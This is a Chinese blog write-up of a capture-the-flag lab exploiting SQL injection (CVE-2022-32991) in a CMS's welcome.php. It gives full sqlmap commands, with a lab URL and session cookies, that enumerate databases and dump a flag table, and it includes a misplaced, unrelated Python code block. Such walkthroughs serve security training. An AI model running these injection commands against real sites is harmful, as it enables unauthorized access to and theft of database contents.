春秋云镜.com 免费空间系列（1） CVE-2022-32991

2023-11-24 18:37:55

文章目录

前言
一、漏洞分析
二、攻克步骤
- 1.下发靶场
- 2.打开注册页面
- 3.登录系统
- 4.通过sqlmap爆破
- - 1.首先通过获取的内容组装爆破语句
  - 2.接着通过sqlmap -D 命令获取数据库下的表结构
  - 3.通过sqlmap -D -T 命令获取表（flag表默认flag都是存在flag表中）内容
- 5.提交flag攻克完成
总结

前言

今天看到一个很好的在线靶场平台地址春秋云镜.com，里边有很多的免费的cve漏洞，从今天起，将更新一个春秋云镜免费空间系列，一个一个攻克cve的漏洞

一、漏洞分析

漏洞名称：CVE-2022-32991
漏洞描述：该CMS的welcome.php中存在SQL注入攻击。
工具准备：sqlmap
在这里插入图片描述

二、攻克步骤

1.下发靶场

```c
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
warnings.filterwarnings('ignore')
import ssl
ssl._create_default_https_context = ssl._create_unverified_context

2.打开注册页面

进入注册页面随意注册，一个账号

在这里插入图片描述

3.登录系统

通过注册的账号登录系统

在这里插入图片描述登录成功后的界面如下图所示
随意点击某个内容，获取点击后的url地址
获取页面cookie 通过开发者工具的网络工具可以直接获取cookie，直接复制cookie的内容

4.通过sqlmap爆破

1.首先通过获取的内容组装爆破语句

python sqlmap.py -u "获取的地址" --cookie "获取的cookie" --dbs

例如我的是

python sqlmap.py -u "http://eci-2zed3kysyght8q6ujoxz.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=3&t=10" --cookie "Hm_lvt_2d0601bd28de7d49818249cf35d95943=1689665047,1689918112; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1690423428; PHPSESSID=q4lhp1v80s2b414sh7ukmf3q7d" --dbs

在python环境中运行该命令，会得到数据库的信息
在这里插入图片描述

2.接着通过sqlmap -D 命令获取数据库下的表结构

运行以下语句

python sqlmap.py -u "你获取的地址" --cookie "你获取的cookie" -D "ctf" --tables

我组装的命令如下

python sqlmap.py -u "http://eci-2zed3kysyght8q6ujoxz.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=3&t=10" --cookie "Hm_lvt_2d0601bd28de7d49818249cf35d95943=1689665047,1689918112; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1690423428; PHPSESSID=q4lhp1v80s2b414sh7ukmf3q7d" -D ctf --tables

在这里插入图片描述

3.通过sqlmap -D -T 命令获取表（flag表默认flag都是存在flag表中）内容

python sqlmap.py -u "你获取的地址" --cookie "你获取的cookie" -D "ctf" -T "flag" --dump

我的组装命令如下

python sqlmap.py -u "http://eci-2zed3kysyght8q6ujoxz.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=3&t=10" --cookie "Hm_lvt_2d0601bd28de7d49818249cf35d95943=1689665047,1689918112; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1690423428; PHPSESSID=q4lhp1v80s2b414sh7ukmf3q7d" -D ctf -T flag --dump

运行如上命令获取falg
在这里插入图片描述

5.提交flag攻克完成

复制flag的时候要复制完整的flag{86b16cf5-c8fb-46aa-a265-3b5227a99f6d}
在这里插入图片描述

总结

自此，迈出了攻防小白的第一步。这个主要考用户的sqlmap的一些命令和用法，熟练掌握sqlmap是我们成长的第一步。

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！

标签：技术

上一篇 > Java Web 学习之JDBC 基础（篇1）
下一篇 > 一、docker安装新版apache/dubbo-admin

Duilib中list控件支持ctrl和shif多行选中的实现

[ICML2015]Batch Normalization:Accelerating Deep Network Training by Reducing Internal Covariate Shif

win10系统微软输入法于eclipse ctrl+shif+f冲突间接处理办法

Codeforces Round #259 (Div. 2) B. Little Pony and Sort by Shif

读LDD3，内存映射与DMA--PAGE_SHIF…

VMware虚拟机安装XP【要先分区，再设置BOOT 启动CD，shif+上移】

更换iBus五笔的左与右Shif

sublime ctrl+shif+f 没用解决办法

idea 对 ctrl + z 的撤销是 ctrl + shif + z

计算机最早的设计师应用于,计算机应用基础选择题doc.doc

win10自带截图神器：Win+Shift+S

Python基础之文件目录操作

python简述目录_Python基础之文件目录操作(示例代码)

tp5 如何做数据采集

任务2-7(服务器字体+阿里巴巴矢量库)

html标签（1)：h1~h6,p,br,pre,hr

TI 电量计介绍与芯片选型指南

几款TI电源芯片简介

TI DSP芯片C2000系列读取FLASH数据

德州仪器(Ti)平台嵌入式开发基础

TI三相电机智能栅极驱动芯片特点分类

省选模拟（12.08） T3 圈圈圈圈圈圈圈圈

Hadoop生态圈技术栈（上）

大数据开发基础入门与项目实战（三）Hadoop核心及生态圈技术栈之6.Impala交互式查询

小猿圈之Linux下Mysql 操作命令

大数据Hadoop生态圈常用面试题

大数据开发基础入门与项目实战（三）Hadoop核心及生态圈技术栈之4.Hive DDL、DQL和数据操作

备战Noip2018模拟赛11（B组）T3 Monogatari 物语

【智能优化算法-圆圈搜索算法】基于圆圈搜索算法Circle Search Algorithm求解单目标优化问题附matlab代码

NYOJ 78 圈水池

递归问题跑道汽车绕圈问题 Python实现

Hadoop生态圈（三）：MapReduce